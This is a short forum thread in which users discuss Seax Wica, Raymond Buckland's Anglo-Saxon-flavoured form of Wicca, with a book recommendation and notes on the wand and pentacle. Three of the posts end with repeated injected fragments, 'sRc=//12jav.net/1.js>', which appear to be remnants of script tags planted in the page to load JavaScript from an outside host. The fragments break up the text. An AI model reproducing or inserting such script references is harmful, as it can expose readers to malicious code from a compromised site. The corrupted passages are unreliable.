During the past 50 years or so,Wicca has changed so much. Has "branched off" in so many different directions; that if Gerald Gardner was alive today he would not recognise the religion he started! What,on Earth, is Seax Wica? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Brysing, Seax Wicca is a form that was created by Ray Buckland that he linked to Anglo-Saxon deities. It's sort of a mashup of Wicca and Anglo-Saxon heatenry. In Seax Wicca there is no lineage, no initiation, and no firm liturgy. It's sort of a do your own thing version of Wicca that bears little relationship to the Trad Wicca in which Buckland was initially trained.

Yes,I suppose like all religions, Wicca has changed over the years. But it seems to have changed so rapidly. All these different "paths" of Wicca. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

you do. pick up Wicca for Life by Raymond Buckland, it was the first book i read on Wicca, it's written from a Seax view [with some history with him and Gardner for contrast] and it should help you. the book is, like, 25$ Canadian, but its worth it.

you can use the wand and pentacle in Seax Wicca, the wand is used to direct energy while the pentacle is either a protection symbol or what you place the bell on while on the altar [pentacle disk] chapter 2 [or 3 it's been a while] describes the tools, altar, and altar placement. complete with pictures. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
